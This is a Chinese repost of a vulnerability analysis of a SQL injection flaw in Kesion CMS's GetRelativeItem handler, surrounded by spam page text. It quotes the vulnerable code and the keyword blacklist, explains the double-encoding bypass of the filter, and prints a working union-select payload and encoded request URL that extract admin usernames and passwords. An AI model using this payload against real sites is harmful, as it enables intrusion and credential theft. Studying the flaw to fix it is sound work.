国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 網站 > CMS建站 > 正文

Kesion cms sql注入漏洞修復及其分析

2024-08-30 19:06:40
字體:
來源:轉載
供稿:網友

文章介紹了desion cms容易被sql注入的修復方法,方法為UnEscape()函數調用位置放在函數體內,或者不調用.

先我們來看代碼:

  1. Dim KS:Set KS=New PublicCls 
  2. Dim Action 
  3. Action=KS.S("Action"
  4. Select Case Action 
  5. Case "Ctoe" CtoE 
  6. Case "GetTags" GetTags 
  7. Case "GetRelativeItem" GetRelativeItem //問題函數 
  8. ...skip... 
  9. Case "getonlinelist" getonlinelist 
  10. End Select 
  11. Sub GetRelativeItem() //漏洞函數開始 
  12. Dim Key:Key=UnEscape(KS.S("Key"))//漏洞位置,只調用ks.s函數,無其它過濾。 
  13. Dim Rtitle:rtitle=lcase(KS.G("rtitle")) 
  14. Dim RKey:Rkey=lcase(KS.G("Rkey")) 
  15. Dim ChannelID:ChannelID=KS.ChkClng(KS.S("Channelid")) 
  16. Dim ID:ID=KS.ChkClng(KS.G("ID")) 
  17. Dim Param,RS,SQL,k,SqlStr 
  18. If Key<>"" Then 
  19. If (Rtitle="true" Or RKey="true") Then 
  20. If Rtitle="true" Then 
  21. param=Param & " title like '%" & key & "%'"//類似搜索型注入漏洞。 
  22. end if 
  23. If Rkey="true" Then 
  24. If Param="" Then 
  25. Param=Param & " keywords like '%" & key & "%'" 
  26. Else 
  27. Param=Param & " or keywords like '%" & key & "%'" 
  28. End If 
  29. End If 
  30. Else 
  31. Param=Param & " keywords like '%" & key & "%'" 
  32. End If 
  33. End If 
  34. If Param<>"" Then 
  35. Param=" where InfoID<>" & id & " and (" & param & ")" 
  36. else 
  37. Param=" where InfoID<>" & id 
  38. end if 
  39. If ChannelID<>0 Then Param=Param & " and ChannelID=" & ChannelID//開源軟件:Vevb.com 
  40. Param=Param & " and verific=1" 
  41. SqlStr="Select top 30 ChannelID,InfoID,Title From KS_ItemInfo " & Param & " order by id desc" //查詢  
  42. Set RS=Server.CreateObject("ADODB.RECORDSET"
  43. RS.Open SqlStr,conn,1,1 
  44. If Not RS.Eof Then 
  45. SQL=RS.GetRows(-1) 
  46. End If 
  47. RS.Close 

如果配合Unescape()函數,剛過濾不會生效,可以采用unicode編碼方式,則不會在瀏覽器中出現被過濾的字符,例如,單引號可以編碼為,%2527,經過解碼后還是“'”號,這樣的話,就可以利用類似php的二次編碼漏洞的方式繞過過濾了.

注入語句:%') union select 1,2,username+'|'+ password from KS_Admin

轉換如下:

  1. /plus/ajaxs.asp?action=GetRelativeItem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 

先進行了過濾,然后才調用UnEscape解碼,代碼如下:

  1. Public Function S(Str) 
  2. S = DelSql(Replace(Replace(Request(Str), "'"""), """""")) 
  3. Function DelSql(Str) 
  4. Dim SplitSqlStr,SplitSqlArr,I 
  5. SplitSqlStr="dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell" 
  6. SplitSqlArr = Split(SplitSqlStr,"|"
  7. For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr) 
  8. If Instr(LCase(Str),SplitSqlArr(I))>0 Then 
  9. Die "<script>alert('系統警告!nn1、您提交的數據有惡意字符" & SplitSqlArr(I) &";n2、您的數據已經被記錄;n3、您的IP:"&GetIP&";n4、操作日期:"&Now&";n Powered By Kesion.Com!');window.close();</script>" 
  10. End if 
  11. Next 
  12. DelSql = Str 
  13. End Function 

這樣我們還是開頭的那句話使用unescape()函數或者不使用本函數.

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 青岛市| 尉犁县| 合山市| 抚远县| 黄梅县| 齐齐哈尔市| 木兰县| 高要市| 锡林郭勒盟| 石嘴山市| 上蔡县| 武威市| 包头市| 福州市| 石首市| 昭通市| 大姚县| 商水县| 岚皋县| 富顺县| 遂川县| 岑巩县| 乌兰县| 丹阳市| 洪江市| 新竹县| 阳朔县| 呈贡县| 全州县| 西乌珠穆沁旗| 龙门县| 罗平县| 墨江| 突泉县| 丹东市| 双桥区| 丰原市| 瓦房店市| 治县。| 锡林浩特市| 扎赉特旗|